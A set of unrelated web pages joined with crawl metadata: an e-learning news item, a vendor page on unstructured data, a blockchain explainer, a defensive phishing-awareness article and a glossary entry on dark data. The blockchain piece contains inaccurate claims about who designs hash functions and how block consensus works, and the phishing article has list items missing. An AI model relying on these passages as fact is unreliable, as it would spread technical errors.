So on top of accounting for everyone, you need to ensure you have the supply chain moving to equip them all. That’s the type of scenario institutions are facing around the world right now – it’s a version of Maslow’s Hierarchy where everyone is reset to ensure the basic needs are met first. Only after that phase, which I suspect many US institutions are emerging from now, can they look at continuity of operations and academic delivery beyond the immediate term.
In the long run I suspect this increases the prioritization of digital transformation and organizational change management but those cycles can only happen after the first layers of the Hierarchy are addressed.
A new online math learning program from McGraw Hill makes it easy and affordable for students and adult learners to prepare for their math placement test, get extra help over the summer, or refresh their skills before returning to college.
ALEKS MathReady is a direct-to-student version of McGraw Hill’s personalized ALEKS program that is used by millions of K-12 and college students to accelerate their math learning and help them succeed in their courses. It is $9.95 for the first month, $24.95 for three months, and $19.95 for each additional month after that.
For students entering college, math placement and college level math courses can be a challenge and are among the contributing reasons that students fall behind or drop out. College math courses often have high failure rates, largely because many new college students lack the foundational math skills needed to be successful. For some, a trusted tutor is a proven model for learning math and reducing math anxiety, yet the high cost of tutoring and scheduling tutorial sessions are barriers. ALEKS MathReady is an affordable alternative for those who are looking for math support.
ALEKS MathReady is a self-paced, online math learning program that is rooted in research and analytics. ALEKS efficiently guides learning by identifying what topics students don’t know and then focusing them on practicing topics they are ready to learn next. With this personalized learning approach, students learn and retain topics efficiently with real-time feedback to keep them motivated and engaged, while reaching their goals.
By Melinda Kong, director of instructional design and learning management system, Nyack College
As we emerge from the last few months of the sudden online teaching shift for courses intended for classroom settings, there are a few glaring lessons learned that will help propel educators forward into the future. While much is still unknown for what the next several months will hold, it is certain that online classwork will be a predominant feature in education.
The methods of online teaching will look different within each education context from K12 to higher education, but one thing is certain; online learning is here to stay and we must adapt to the needs of current and incoming students.
We will likely see a mix of three offerings when thinking about the new normal of distanced learning; the continued implementation of hybrid courses, full fall terms taught online-only, and even HyFlex courses, in which students will be able to be in either face-to-face classes or join virtually when needed.
As educators, it’s important to look at what happened as courses were quickly moved online and learn from what was able to be accomplished. Understanding what worked well and what didn’t will help all educators grow and adopt better pedagogy for online instruction.
Foundationally all courses, despite their delivery makeup, involve diligent planning. All teachers, whether in a face-to-face classroom, online course, or a mix of the two, plan extensively for their courses.
Response from Kaine Shutler, managing director, Plume.
Schools might be presented with a unique challenge in the short term: creating an e-learning platform, populating it with content etc. But long term, this system will provide students with more learning opportunities and we see this benefitting both the academically engaged students, but most importantly, the students who have struggled with classroom learning.
For parents, we hope that they’ll be more active in their child’s learning and we believe this will strongly improve caregiver/ student relationships, as well as student’s confidence as they engage with independent learning opportunities.
Despite these merits, elearning will not replace classrooms; schools provide a safe place for students where they can be mentored by teaching professionals and gain valuable social skills. All in all, we think elearning will support classroom learning, independence and will strengthen student/parent relationships as they play a more active role in academic development. | <urn:uuid:7bff89b7-a3d8-4c91-a632-c81a932f8b83> | CC-MAIN-2024-38 | https://educationitreporter.com/tag/e-learning/ | 2024-09-14T23:49:45Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651601.85/warc/CC-MAIN-20240914225323-20240915015323-00720.warc.gz | en | 0.965414 | 2,330 | 3.015625 | 3 |
What is unstructured data?
Unstructured Data refers to information that doesn't follow a predefined format or organised structure, making it more challenging to analyse and process. Unlike neatly arranged data found in spreadsheets or databases, unstructured data lacks clear categories or labels.
What does Unstructured Data look like?
It includes things like text from emails, social media posts, audio recordings, images, videos, and documents. Because of its free-flowing nature, extracting valuable insights from unstructured data requires advanced technologies, like artificial intelligence and natural language processing, to understand and interpret the content effectively.
What are the Challenges of Unstructured Data?
Dealing with unstructured data presents difficulties. This info lacks organisation, complicating analysis. Furthermore, it's often in non-relational databases, posing querying challenges. Key issues include:
Security complexity: Unstructured data's dispersion across formats and locations makes securing it intricate.
Indexing challenges: Due to its randomness, indexing is tough and error-prone.
Data scientist dependence: Interpreting unstructured data often demands skilled data scientists.
Costly analytics tools: Parsing such data requires advanced, expensive analytics software, not always budget-friendly.
Format diversity: Unstructured data's lack of format hampers its raw use.
Why is it important?
A lot of data, essential for tackling complex issues, can't be stored in databases, such as customer buying patterns when mapped to social media feeds, another example is CCTV, you need to refer to it at a later date, but can’t store video files in a database - these are both forms of Unstructured Data.
Did you know 80% of data growth in an organisation is unstructured data?
Why choose boxxe?
This is where boxxe comes in. We can help by working with key technology partners such as Dell, Quantum and Hitachi Vantara who work closely with our ISV partners Libnova, Achivematica, Preservica and Atempo. boxxe can make sense of messy data from places like social media, emails, and images, by extracting important information from text and sorting the data into useful categories. Data enrichment is the key, adding meaningful metadata turns data into searchable, contextual information that is the foundation for a business' insights which lead to better decisions and improved operations and customer experience.
Extract insights for enhanced business decisions and better customer experience
Find out more below
We can provide solutions for the complete journey. Understanding with our audit and assessment tools, we can produce strategy and roadmap reports, we can store and manage the data with multiple vendor solutions Dell, Quantum and Hitachi.
Contact the Infrastructure Team via the form below to learn how boxxe can help by collaborating with tech partners to decipher unstructured data from sources. Extracting insights enables enhanced business decisions and better customer experiences.
Ready to find out how we can help you stay live and efficient?
Contact us today
Register for a Company Account
Create a business account and instantly start shopping confidently with self-serve features designed for businesses and access to a dedicated account team when you need it. Get in touch to learn more. | <urn:uuid:c0e4d2dc-4f48-4478-beb2-b8fd9df14b26> | CC-MAIN-2024-38 | https://boxxe.com/news-and-resources/news/unstructured-data-solutions | 2024-09-16T07:19:54Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651676.3/warc/CC-MAIN-20240916044225-20240916074225-00620.warc.gz | en | 0.922329 | 668 | 3.046875 | 3 |
People ask me frequently, “Please tell me, what is blockchain and how does it work?” I have been using various approaches and media answering this question, whiteboards, paper and even beer-coasters, and recently created a single page canvas combining all my scribbles and drawings to answer this question. This works very well, with great response and I like to share it including the story that goes with it. Maybe it is somewhat technical but most people follow the explanation quite well and really feel that they have learned something. Re-use is granted, but please keep it “as is” and respect the copyrights. (See below for downloads, OpenOffice and PDF format)
Doing business and transactions between organizations and people requires TRUST. Normally we do not think about this but every day we pay our invoices or buy goods with a debit- or credit card, issued by a bank or credit card company who guarantees these payments. These so called middleman are initiated, regulated and audited by governments giving us the required trust. But what if you could arrange this via technology providing us with the same guarantees as a middleman but without the middleman. This is where blockchain can help us, providing a mechanism to do business without knowing your counter party or their reputation. First used for Bitcoin transactions (crypto-currency) but suitable for any other transaction or contract that we want to register in an immutable and secure manner. Think about registering land property, music rights or mortgages.
In a typical blockchain we recognize four important elements: the hash, the block, the nonce and the consensus model. How does this work?
First let me explain hashing, a key-element in blockchain. Hashing is a mathematical function that converts an arbitrary text into a fixed length digital key. This process is irreversible, every key produced is unique and even the slightest change in the input generates a completely different key. (Observe the W and w difference). This key, also called the HASH, can be seen as the unique signature or fingerprint of that piece of text or information. (FYI: Hash functions are designed by the United States National Security Agency (NSA) and made available under a royalty-free license.)
Next, let’s have a look at a block and its structure in a simplified model. We distinguish two main parts: the heading of the block with housekeeping details and a section containing the transactions. (In this example you see a set of simple financial transactions, but any transaction can be included.) The housekeeping section is especially important as it is used to link the new block with previous blocks. Within the heading we see several fields and most are pretty straight forward; version info, time stamp and a copy of the previous block Hash. To secure that the transactions in the block itself are fingerprinted in an irreversible way, a “Transactions Hash” is generated from all entries with the above explained algorithm and added into the header. The information of all these header-fields is then used to generate the Hash, or signature of the block.
So why do we include a NONCE in the header?
Creating a signature of a new block is pretty straight forward but makes it also vulnerable for anyone who wants to tamper with its content. Calculating a hash is a matter of milliseconds, so changing a transaction and creating a new hash is very easy, too easy and therefore not 100% secure. We can prevent this by demanding that the Hash of a block starts with leading zeroes which is only possible if we change the input for the hash calculation. This is where the Nonce (Number Once) comes into play, every time we change its value a different hash is generated. Verifying all possibilities requires serious compute power/time and that makes it unattractive to tamper with the transactions in the new and all depending previous blocks. This process is known as – “the mining of a block”, providing us with the security that transactions are “written in stone and immutable”. Mining – especially of crypto-currency – is financially very profitable and more compute power is added on daily basis. To deal with this, the number of leading zeroes is regularly adjusted to balance the increase in compute power. (FYI: Mining reward for the Bitcoin Blockchain is currently 12,5 BtC per block).
Once the right Hash is found, the newly mined block is presented to the network of “fellow” miners for approval and consensus. Typically six fellows have to confirm that the block is correct after which it is added to the chain. This consensus cycle is another security mechanism adding to the robustness of a blockchain. The process repeats itself and the hash of the recently added block is used as input to mine the next block resulting in a chain of blocks. Impossible to alter without changing the previous block, and the previous block, and the previous block…..
Blockchain offers us an highly effective means to organize the need for trust in a different way, secure and clean on a global basis, robust and transparent with no/limited overhead.
Originally posted at: LinkedIn | <urn:uuid:9910a402-19f5-48ae-bc12-f6e6ecf78c11> | CC-MAIN-2024-38 | https://resources.experfy.com/fintech/please-tell-me-what-is-blockchain-and-how-does-it-work/ | 2024-09-16T06:04:22Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651676.3/warc/CC-MAIN-20240916044225-20240916074225-00620.warc.gz | en | 0.947405 | 1,047 | 3.078125 | 3 |
(9 votes, average: 5.00 out of 5)
With the progress of the digital world, cybercrime has gotten to the surface, and now, unfortunately, phishing is one of their favorite targeting methods.
The fraudsters use these attacks to make people disclose confidential details that come under deep personal information, like login credentials, credit card numbers, and so on.
Phishing fraud may bring catastrophic outcomes like financial losses, identity theft, or data breaches.
Thus, it would help if you learned about this precisely because it will help you be aware of phishing operations, understand how they work, and how to protect your computer from these dubious attacks.
Phishing is a social engineering attack in which cyber criminals create fake sources to get personal data like banking or other details and impersonate a trusted source like a bank, company, or governmental body.
Such scammers achieve their goal by sending phony emails and text messages or creating bogus websites that look legitimate.
Once an unknowing individual is manipulated into giving away their personal details and clicking through the links or attachments containing malware, the hacker can steal their identities and siphon off the money from financial accounts.
The environment of phishing scams is enormously diverse. Apart from the manifold techniques and goals, they also focus on different audiences and institutions. Here are some common types of phishing attacks:
Email Phishing is the most widely distributed attack, and cybercriminals usually send fake emails with some details from trusted providers like banks, online stores, or service providers.
The private type is more convincing and precise, as phishing is almost always concentrated on some individuals or organizations. The hackers dig deeper to find particular information concerning the victim and fabricate email messages that look authentic, which makes it more effective.
The cybercriminals inside chose this method, in which a text message takes the place of an email and directs the victim to click on dangerous links or provide important information.
Voice phishing is a type of attack carried out either via text message or during phone calls. The fake messages usually pose as legitimate organizations, and they sway the victim into submitting their personal data or transferring funds.
Cybercriminals use this tactic by creating mobile imitation customer support agents or popups that look right and ask users to provide login credentials or secret information.
Recommended: Slowloris Attack: How it Works, Identify and Prevent
Phishing attacks commonly show the same schemes, regardless of the particular result of attempted hacking. Here’s how they usually work:
While phishing attacks can be highly sophisticated and convincing, several signs can help you recognize them:
The most common kinds of phishing are those phishing emails. Here are some key characteristics to look out for:
Phishing scams can take many forms, but some common examples include:
To protect yourself from phishing attacks, follow these best practices:
If you suspect that you’ve fallen victim to a phishing attack, take the following steps immediately:
Informing the authorities about phishing attacks is a meaningful way to track and fight them. Here are some ways to report phishing:
One strong indicator of protection is S/MIME certificates, which should be applied. These digital tokens are on top of your emails, the randomly generated encryption keys, and digital signatures, which ensure the confidentiality and integrity of your email communications.
S/MIME certificates let you verify the sender’s validity and protect your vital information from the phishing scams that sinister people could utilize to have them intercepted or tampered with.
Protect your Email Communication with S/MIME or Email Signing Certs – Price Starts at Just $12.99/yr
Phishing attacks are one the most severe threats to individuals and organizations worldwide, taking advantage of people’s lack of information. Therefore, it is important to stay cautious to protect yourself from being trapped by these predators.
By comprehending the phishing mechanisms, identifying the elements of phishing emails, and following the guidelines for online security, you will get rid of many risks of becoming a victim.
You must remember that often, when a situation is suspicious, it’s best not to knowingly put yourself in danger. If something occurs that gives your suspicions the signal, act quickly and report it to the authorities.
Phishing scams are widespread, targeting millions of people. This is so because they are approached from larger and mixed angles. Another kind of approach is spear phishing, which is more directed and influenced by the selected individual or organization’s personal experience.
In addition to targeting an individual via phone calls or voice mails, a cybercrime tactic termed “vishing” or voice phishing may be applied.
No, you should never click on links or open attachments received from unknown or suspect sources. These can be used in spear phishing or contain malware.
If you become a victim of phishing, change your passwords for all used accounts, keep an eye on money accounts and credit records, and communicate the information you know to responsible authorities.
While antivirus programs can detect and prevent attack attempts by some phishing attempts, they are not foolproof mechanisms.
It is essential to be aware of and apply the best practices for online security, like verifying the suitability of sources for sensitive information and being extremely careful of emails or messages you don’t know where they are coming from. | <urn:uuid:d7547a1f-c115-419e-aa7e-063be803c719> | CC-MAIN-2024-38 | https://certera.com/blog/phishing-attacks-explained-how-to-spot-and-prevent-online-scams/ | 2024-09-17T13:22:33Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651773.64/warc/CC-MAIN-20240917104423-20240917134423-00520.warc.gz | en | 0.934912 | 1,106 | 3.328125 | 3 |
- Bring your own device
- Copy protection
- Data access control
- Data at rest
- Data in transit
- Data in use
- Data leakage
- Data loss prevention
- Data security
- Data security posture management
- Data security breach
- Data theft
- File security
- Incident response
- Indicators of compromise
- Insider threat
- Ransomware attack
- USB blocker
- USB drop attack
What is dark data?
Dark data refers to all the unused, unstructured data stored in an organization for compliance or forensic investigations in the future. Gartner defines dark data as "the information assets organizations collect, process, and store during regular business activities, but generally fail to use for other purposes." A few instances of dark data include server log files, ex-employee information, email records, older versions of files currently in use, and more.
Dark data statistics
60 percent of more than 1,300 global businesses said that more than half of their data was dark in 2019.
32 percent of respondents cited lack of resources as a hurdle for retrieving dark data.
Why is dark data important?
Gain untapped insights
Use dormant business data to mine essential insights and patterns in internal processes and customer correspondences for continuous improvement. Organizations could lose to competitors by ignoring important information hidden within dark data.
Spot security vulnerabilities
When the bulk of your data is not securely stashed away, it is vulnerable to leaks and thefts. It's extremely easy for hackers to gain access to data with public access and to systems using outdated software components. Therefore, it is important to know if any business-critical information is within your dark data stores.
Optimize data storage
Old and stale files that are no longer in use should be pruned from your storage ecosystem. The cost of storing stale files and other redundant data is quite high. Use a redundant, obsolete, and trivial (ROT) data calculator to see how much you can save. Calculate now.
What is dark data management?
Dark data management includes the overall governance of underutilized data in an organization. A framework of how the data will be collected, processed, utilized, and disposed of is given attention to in this process. With proper management of dark data, organizations can improve their customer experience, understand market trends, and strengthen their business operations to develop and maximize business profits in their ecosystems.
Types of dark data
Based on how it is used and where it is sourced from, dark data is categorized as:
- Redundant data: Data which is copied multiple times intentionally or unintentionally in files.
- Unused data: Data that is collected during business interactions but is left unprocessed in file repositories.
- Spatial data: Data collected by IoT devices, such as sensors and processors that interact with other electronic devices.
- Unstructured data: Data that is raw, left uncategorized based on certain criteria, and can’t be used for decision-making.
- Meta data: Information or secondary data which describes or adds context to the primary data, such as the format, the source, and the time at which the data was collected.
- Syndicated data: Datasets captured from third-party firms and not as part of an organization's business operations.
Security concerns over dark data
Dark data can be vast in size and often isn't secured by organizations. By not monitoring dark data, businesses face the following risks:
- Exposure or breach of sensitive data such as personally identifiable information (PII), confidential business data, and customer payment information left unidentified in your repositories.
- Unsecured access to internal data such as log files, passwords, and previous employees' information, which can be leveraged by malicious insiders and external hackers to carry out data theft or breaches.
- Older file versions or software versions can enable hackers to create a backdoor into the organization's network.
- Unstructured data that is not monitored for sudden spike in file activities can result in ransomware and other malware infections going undetected. | <urn:uuid:4cab9f2c-ebb7-495d-bf89-123e449350a7> | CC-MAIN-2024-38 | https://www.manageengine.com/in/data-security/what-is/dark-data.html?source=what-is-file-analysis | 2024-09-19T23:23:17Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652073.91/warc/CC-MAIN-20240919230146-20240920020146-00320.warc.gz | en | 0.920811 | 836 | 2.828125 | 3 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.